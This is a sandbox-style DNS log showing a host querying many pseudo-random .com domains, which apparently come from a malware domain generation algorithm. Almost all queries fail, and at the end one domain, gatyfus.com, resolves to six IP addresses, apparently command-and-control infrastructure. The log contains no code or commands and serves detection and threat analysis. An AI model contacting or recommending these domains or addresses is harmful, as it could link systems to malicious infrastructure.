Nov 11, 2024 18:13:24.101762056 CET	1.1.1.1	192.168.2.6	0x79d5	Name error (3)	gatyzyw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.101893902 CET	1.1.1.1	192.168.2.6	0x6589	Name error (3)	gatypuz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.102504015 CET	1.1.1.1	192.168.2.6	0x5a01	Name error (3)	puvymug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.102742910 CET	1.1.1.1	192.168.2.6	0x32d4	Name error (3)	pumyleg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.103481054 CET	1.1.1.1	192.168.2.6	0xc741	Name error (3)	lyryler.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.103497982 CET	1.1.1.1	192.168.2.6	0x89e3	Name error (3)	volygyt.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.104176044 CET	1.1.1.1	192.168.2.6	0xc9fa	Name error (3)	vocymum.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.106076002 CET	1.1.1.1	192.168.2.6	0x2030	Name error (3)	lyvyjoj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.106627941 CET	1.1.1.1	192.168.2.6	0x506b	Name error (3)	pufypuv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.106646061 CET	1.1.1.1	192.168.2.6	0xa6cf	Name error (3)	volymuc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.107695103 CET	1.1.1.1	192.168.2.6	0x927	Name error (3)	vocyjik.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.110003948 CET	1.1.1.1	192.168.2.6	0x386c	Name error (3)	qebykoq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.124491930 CET	1.1.1.1	192.168.2.6	0xe919	Name error (3)	vopyput.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.126101017 CET	1.1.1.1	192.168.2.6	0xadbf	Name error (3)	vojybef.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.127789021 CET	1.1.1.1	192.168.2.6	0x2f74	Name error (3)	pufycog.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.127985001 CET	1.1.1.1	192.168.2.6	0xa6bb	Name error (3)	qexyhul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.128516912 CET	1.1.1.1	192.168.2.6	0xfa75	Name error (3)	galynus.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.132668972 CET	1.1.1.1	192.168.2.6	0xefb	Name error (3)	lyrytyx.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.135754108 CET	1.1.1.1	192.168.2.6	0xaa7	Name error (3)	qetylel.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.136796951 CET	1.1.1.1	192.168.2.6	0x55a3	Name error (3)	pujybev.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.155124903 CET	1.1.1.1	192.168.2.6	0xe371	Name error (3)	lygysid.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.316440105 CET	1.1.1.1	192.168.2.6	0x70d0	Name error (3)	gaqykoz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.361932039 CET	1.1.1.1	192.168.2.6	0x8771	Name error (3)	vowyqik.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.363503933 CET	1.1.1.1	192.168.2.6	0xeaaf	Name error (3)	lygyxux.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.366138935 CET	1.1.1.1	192.168.2.6	0x67a8	Name error (3)	gahycuz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.374419928 CET	1.1.1.1	192.168.2.6	0xe7da	Name error (3)	pupyteg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.384500027 CET	1.1.1.1	192.168.2.6	0x9d05	Name error (3)	gacyfeb.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.438030958 CET	1.1.1.1	192.168.2.6	0xf4a5	Name error (3)	gaqykoz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.439718962 CET	1.1.1.1	192.168.2.6	0x4e6c	Name error (3)	vocygef.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.461639881 CET	1.1.1.1	192.168.2.6	0x7027	Name error (3)	pupyteg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.501416922 CET	1.1.1.1	192.168.2.6	0x4f82	Name error (3)	qekyqop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.556915998 CET	1.1.1.1	192.168.2.6	0x461d	Name error (3)	lyxywer.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.584822893 CET	1.1.1.1	192.168.2.6	0xe3b9	Name error (3)	qexyfag.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.588254929 CET	1.1.1.1	192.168.2.6	0xc89	Name error (3)	lysytyn.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.589390993 CET	1.1.1.1	192.168.2.6	0x9b1c	Name error (3)	puzydog.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.589658976 CET	1.1.1.1	192.168.2.6	0xf84	Name error (3)	galyvaw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.589958906 CET	1.1.1.1	192.168.2.6	0xc8d2	Name error (3)	pumyjip.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.590090036 CET	1.1.1.1	192.168.2.6	0x11ba	Name error (3)	lymyjix.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.594120979 CET	1.1.1.1	192.168.2.6	0x1b9f	Name error (3)	purywoq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.595376015 CET	1.1.1.1	192.168.2.6	0xa7e8	Name error (3)	vofypuf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.596271038 CET	1.1.1.1	192.168.2.6	0x1c26	Name error (3)	lyvytuj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.608371019 CET	1.1.1.1	192.168.2.6	0xc4e4	Name error (3)	qeqyqul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.610882998 CET	1.1.1.1	192.168.2.6	0x9b93	Name error (3)	qekyvol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.611550093 CET	1.1.1.1	192.168.2.6	0x564	Name error (3)	qedytyg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.611807108 CET	1.1.1.1	192.168.2.6	0xa300	Name error (3)	gadypub.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.611816883 CET	1.1.1.1	192.168.2.6	0x8ddc	Name error (3)	volybak.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.612587929 CET	1.1.1.1	192.168.2.6	0xbd88	Name error (3)	pujyjav.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.612597942 CET	1.1.1.1	192.168.2.6	0xcb8c	Name error (3)	vopyrem.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.617686987 CET	1.1.1.1	192.168.2.6	0x81d7	Name error (3)	qetyraq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.618721008 CET	1.1.1.1	192.168.2.6	0xfa3c	Name error (3)	puvygyv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.629359961 CET	1.1.1.1	192.168.2.6	0xceb6	Name error (3)	vonyjuc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.630024910 CET	1.1.1.1	192.168.2.6	0xce36	Name error (3)	qebytiq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.631175995 CET	1.1.1.1	192.168.2.6	0xa7fe	Name error (3)	gatyvyz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.631922960 CET	1.1.1.1	192.168.2.6	0x1b93	Name error (3)	vopybyt.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.632154942 CET	1.1.1.1	192.168.2.6	0xa66f	Name error (3)	qeqykop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.632165909 CET	1.1.1.1	192.168.2.6	0x8f8e	Name error (3)	lykyjad.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.632740021 CET	1.1.1.1	192.168.2.6	0x4a0c	Name error (3)	lyxyfan.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.632750988 CET	1.1.1.1	192.168.2.6	0xe377	Name error (3)	lyrywoj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.633380890 CET	1.1.1.1	192.168.2.6	0x756b	Name error (3)	qedyfyq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.634048939 CET	1.1.1.1	192.168.2.6	0x29bb	Name error (3)	ganypih.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.638355970 CET	1.1.1.1	192.168.2.6	0xc2c	Name error (3)	galykes.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.639386892 CET	1.1.1.1	192.168.2.6	0x5d17	Name error (3)	qedynul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.639556885 CET	1.1.1.1	192.168.2.6	0x7068	Name error (3)	pumypog.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.639686108 CET	1.1.1.1	192.168.2.6	0x7dc7	Name error (3)	qegyxup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.639832973 CET	1.1.1.1	192.168.2.6	0xc851	Name error (3)	pufyxyp.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.639844894 CET	1.1.1.1	192.168.2.6	0x8891	Name error (3)	lykyvor.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.640818119 CET	1.1.1.1	192.168.2.6	0xf799	Name error (3)	ganyhus.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.642163038 CET	1.1.1.1	192.168.2.6	0x9991	Name error (3)	pumyxiv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.643913984 CET	1.1.1.1	192.168.2.6	0x948e	Name error (3)	qeqysag.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.644639015 CET	1.1.1.1	192.168.2.6	0x68a2	Name error (3)	vofymik.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.646224022 CET	1.1.1.1	192.168.2.6	0x3ad5	Name error (3)	gaqycos.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.646341085 CET	1.1.1.1	192.168.2.6	0x4950	Name error (3)	lysynur.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.646445036 CET	1.1.1.1	192.168.2.6	0xa4ca	Name error (3)	lygymoj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.646795988 CET	1.1.1.1	192.168.2.6	0xb054	Name error (3)	lymysan.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.647716045 CET	1.1.1.1	192.168.2.6	0x8ecb	Name error (3)	qegyqaq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.648986101 CET	1.1.1.1	192.168.2.6	0x95ab	Name error (3)	vojyjof.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.650264025 CET	1.1.1.1	192.168.2.6	0x477a	Name error (3)	vonyzuf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.650969028 CET	1.1.1.1	192.168.2.6	0xc214	Name error (3)	lyvygyd.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.650979996 CET	1.1.1.1	192.168.2.6	0x3482	Name error (3)	gaqydeb.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.651376963 CET	1.1.1.1	192.168.2.6	0xbc6c	Name error (3)	qebyhuv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.655318975 CET	1.1.1.1	192.168.2.6	0xb391	Name error (3)	lyryfyd.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.655736923 CET	1.1.1.1	192.168.2.6	0xfa3f	Name error (3)	qexylup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.656189919 CET	1.1.1.1	192.168.2.6	0x3e27	Name error (3)	pupybul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.656203032 CET	1.1.1.1	192.168.2.6	0x9f3	Name error (3)	vofygum.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.658483028 CET	1.1.1.1	192.168.2.6	0x7bff	Name error (3)	qekykev.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.663283110 CET	1.1.1.1	192.168.2.6	0xcfab	Name error (3)	volykyc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.665824890 CET	1.1.1.1	192.168.2.6	0x56e0	Name error (3)	puzywel.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.665837049 CET	1.1.1.1	192.168.2.6	0x4dc1	Name error (3)	lyxylux.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.669975042 CET	1.1.1.1	192.168.2.6	0xf51	Name error (3)	gadyfuh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.671930075 CET	1.1.1.1	192.168.2.6	0x8e5f	Name error (3)	qeqyxov.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.695014000 CET	1.1.1.1	192.168.2.6	0x3353	Name error (3)	qetyvep.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.696867943 CET	1.1.1.1	192.168.2.6	0x16ad	Name error (3)	purydyv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.787395000 CET	1.1.1.1	192.168.2.6	0xf806	Name error (3)	puvytuq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.792524099 CET	1.1.1.1	192.168.2.6	0x994e	Name error (3)	gahyhob.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.802690029 CET	1.1.1.1	192.168.2.6	0xc59d	Name error (3)	vocyruk.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.805619001 CET	1.1.1.1	192.168.2.6	0xe20a	Name error (3)	purycap.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.813952923 CET	1.1.1.1	192.168.2.6	0x9ff0	Name error (3)	gacyryw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.816951990 CET	1.1.1.1	192.168.2.6	0x26fc	Name error (3)	lyryvex.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.835838079 CET	1.1.1.1	192.168.2.6	0x471	Name error (3)	lygygin.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.905401945 CET	1.1.1.1	192.168.2.6	0x6e1a	Name error (3)	vowycac.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.953387022 CET	1.1.1.1	192.168.2.6	0x3d3a	Name error (3)	pufygug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.969511986 CET	1.1.1.1	192.168.2.6	0x412	Name error (3)	qexyryl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.978635073 CET	1.1.1.1	192.168.2.6	0xd2e0	Name error (3)	volyqat.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.983066082 CET	1.1.1.1	192.168.2.6	0x551e	Name error (3)	pujycil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.983592033 CET	1.1.1.1	192.168.2.6	0x717b	Name error (3)	gatyrah.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.984596014 CET	1.1.1.1	192.168.2.6	0xb5c8	Name error (3)	puzybeq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:25.008692026 CET	1.1.1.1	192.168.2.6	0xbbfc	Name error (3)	vojycit.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:25.009903908 CET	1.1.1.1	192.168.2.6	0x24f2	Name error (3)	lyxynej.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:25.010381937 CET	1.1.1.1	192.168.2.6	0x3569	Name error (3)	vofyzyc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:25.072876930 CET	1.1.1.1	192.168.2.6	0x2d44	Server failure (2)	lysyfyj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:25.118318081 CET	1.1.1.1	192.168.2.6	0xe629	Name error (3)	puvyxil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:25.122131109 CET	1.1.1.1	192.168.2.6	0x5e10	Name error (3)	gahycuz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:25.122143030 CET	1.1.1.1	192.168.2.6	0xc034	Name error (3)	gacyfeb.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:25.122467041 CET	1.1.1.1	192.168.2.6	0xf47a	Name error (3)	pufymoq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:25.122483969 CET	1.1.1.1	192.168.2.6	0xe9f8	Name error (3)	lygyxux.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:25.122494936 CET	1.1.1.1	192.168.2.6	0x73c7	Name error (3)	vowyqik.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:25.133294106 CET	1.1.1.1	192.168.2.6	0x5d9e	Name error (3)	gacyzuz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:25.140002012 CET	1.1.1.1	192.168.2.6	0xf4be	Name error (3)	vowydef.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.861366034 CET	1.1.1.1	192.168.2.6	0xe48f	Name error (3)	qeqytup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.862221956 CET	1.1.1.1	192.168.2.6	0xe27c	Name error (3)	vofybyf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.866333008 CET	1.1.1.1	192.168.2.6	0x6290	Name error (3)	vowypit.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.873048067 CET	1.1.1.1	192.168.2.6	0xc5dc	Name error (3)	lykymox.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.877455950 CET	1.1.1.1	192.168.2.6	0x95f9	Name error (3)	gacykeh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.878545046 CET	1.1.1.1	192.168.2.6	0x276	Name error (3)	puzyjoq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.879885912 CET	1.1.1.1	192.168.2.6	0x6001	Name error (3)	vopydek.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.888247967 CET	1.1.1.1	192.168.2.6	0x37ed	Name error (3)	qebylug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.905951023 CET	1.1.1.1	192.168.2.6	0x3f70	Name error (3)	pujymip.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.914833069 CET	1.1.1.1	192.168.2.6	0x433e	Name error (3)	lyxyjaj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.917176962 CET	1.1.1.1	192.168.2.6	0x50f1	Name error (3)	gatydaw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.934504986 CET	1.1.1.1	192.168.2.6	0xd388	Name error (3)	purypol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.937472105 CET	1.1.1.1	192.168.2.6	0xad59	Name error (3)	qegynuv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.945791960 CET	1.1.1.1	192.168.2.6	0xffc9	Name error (3)	vonyryc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.946202040 CET	1.1.1.1	192.168.2.6	0x2016	Name error (3)	qekyhil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.946671963 CET	1.1.1.1	192.168.2.6	0x885c	Name error (3)	lykygur.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.946980953 CET	1.1.1.1	192.168.2.6	0x6e2c	Name error (3)	qebyrev.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.947591066 CET	1.1.1.1	192.168.2.6	0x74d6	Name error (3)	ganyrys.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.948227882 CET	1.1.1.1	192.168.2.6	0x1344	Name error (3)	lyryxij.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.965193033 CET	1.1.1.1	192.168.2.6	0x45c7	Name error (3)	qedyveg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.965568066 CET	1.1.1.1	192.168.2.6	0xd941	Name error (3)	pumytup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.968076944 CET	1.1.1.1	192.168.2.6	0x683b	Name error (3)	galyhiw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.968806028 CET	1.1.1.1	192.168.2.6	0x39b6	Name error (3)	pujygul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.968816996 CET	1.1.1.1	192.168.2.6	0x7eac	Name error (3)	qegyfyp.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.968986034 CET	1.1.1.1	192.168.2.6	0x616f	Name error (3)	vocyqaf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.971333027 CET	1.1.1.1	192.168.2.6	0xc43e	Name error (3)	vopycom.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.973654985 CET	1.1.1.1	192.168.2.6	0x31aa	Name error (3)	qexyqog.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.984572887 CET	1.1.1.1	192.168.2.6	0xdc1c	Name error (3)	puryxuq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.986620903 CET	1.1.1.1	192.168.2.6	0xcd5f	Name error (3)	pufydep.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.987879038 CET	1.1.1.1	192.168.2.6	0xdb35	Name error (3)	puvywav.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.987890959 CET	1.1.1.1	192.168.2.6	0x4278	Name error (3)	gaqypiz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.988348961 CET	1.1.1.1	192.168.2.6	0xbe87	Name error (3)	qetysal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.988364935 CET	1.1.1.1	192.168.2.6	0x3e60	Name error (3)	vojygut.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.988904953 CET	1.1.1.1	192.168.2.6	0xcd3b	Name error (3)	lyvylyn.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.988925934 CET	1.1.1.1	192.168.2.6	0x875e	Name error (3)	vocykem.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.989665985 CET	1.1.1.1	192.168.2.6	0x83cb	Name error (3)	lygyfex.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.989701986 CET	1.1.1.1	192.168.2.6	0x94f1	Name error (3)	vowyzuk.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.989926100 CET	1.1.1.1	192.168.2.6	0xca96	Name error (3)	gadydas.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.990219116 CET	1.1.1.1	192.168.2.6	0xd9e8	Name error (3)	lymylyr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.990231037 CET	1.1.1.1	192.168.2.6	0xb423	Name error (3)	lyxymin.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.991030931 CET	1.1.1.1	192.168.2.6	0x2759	Name error (3)	pufybyv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.991095066 CET	1.1.1.1	192.168.2.6	0x178e	Name error (3)	gaqyzuw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.991219997 CET	1.1.1.1	192.168.2.6	0x2564	Name error (3)	vofydac.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.991230011 CET	1.1.1.1	192.168.2.6	0x72b	Name error (3)	qeqylyl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.991702080 CET	1.1.1.1	192.168.2.6	0x676a	Name error (3)	qexykaq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.993864059 CET	1.1.1.1	192.168.2.6	0xc32d	Name error (3)	gadyveb.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.993875980 CET	1.1.1.1	192.168.2.6	0x43a9	Name error (3)	puzymig.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:29.000205994 CET	1.1.1.1	192.168.2.6	0x5562	Name error (3)	ganyzub.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:29.001223087 CET	1.1.1.1	192.168.2.6	0x5806	Name error (3)	gatycoh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:29.007472038 CET	1.1.1.1	192.168.2.6	0xd5e0	Name error (3)	lyvywed.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:29.008328915 CET	1.1.1.1	192.168.2.6	0xa32e	Name error (3)	volymum.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:29.010353088 CET	1.1.1.1	192.168.2.6	0xbfe	Name error (3)	puvylyg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:29.010364056 CET	1.1.1.1	192.168.2.6	0x651e	Name error (3)	lymytux.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:29.010375977 CET	1.1.1.1	192.168.2.6	0xf559	Name error (3)	gahynus.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:29.010387897 CET	1.1.1.1	192.168.2.6	0x15f4	Name error (3)	gacyqob.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:29.010935068 CET	1.1.1.1	192.168.2.6	0xeaf3	Name error (3)	volyjok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:29.010982037 CET	1.1.1.1	192.168.2.6	0x90d2	Name error (3)	gahyfyz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:29.011136055 CET	1.1.1.1	192.168.2.6	0x3898	Name error (3)	qetyxiq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.482089043 CET	1.1.1.1	192.168.2.6	0x5d7e	Name error (3)	vojyjof.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.483258009 CET	1.1.1.1	192.168.2.6	0x58fc	No error (0)	gatyfus.com		85.17.31.82	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.483258009 CET	1.1.1.1	192.168.2.6	0x58fc	No error (0)	gatyfus.com		85.17.31.122	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.483258009 CET	1.1.1.1	192.168.2.6	0x58fc	No error (0)	gatyfus.com		178.162.203.202	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.483258009 CET	1.1.1.1	192.168.2.6	0x58fc	No error (0)	gatyfus.com		178.162.203.211	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.483258009 CET	1.1.1.1	192.168.2.6	0x58fc	No error (0)	gatyfus.com		178.162.203.226	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.483258009 CET	1.1.1.1	192.168.2.6	0x58fc	No error (0)	gatyfus.com		178.162.217.107	A (IP address)	IN (0x0001)	false
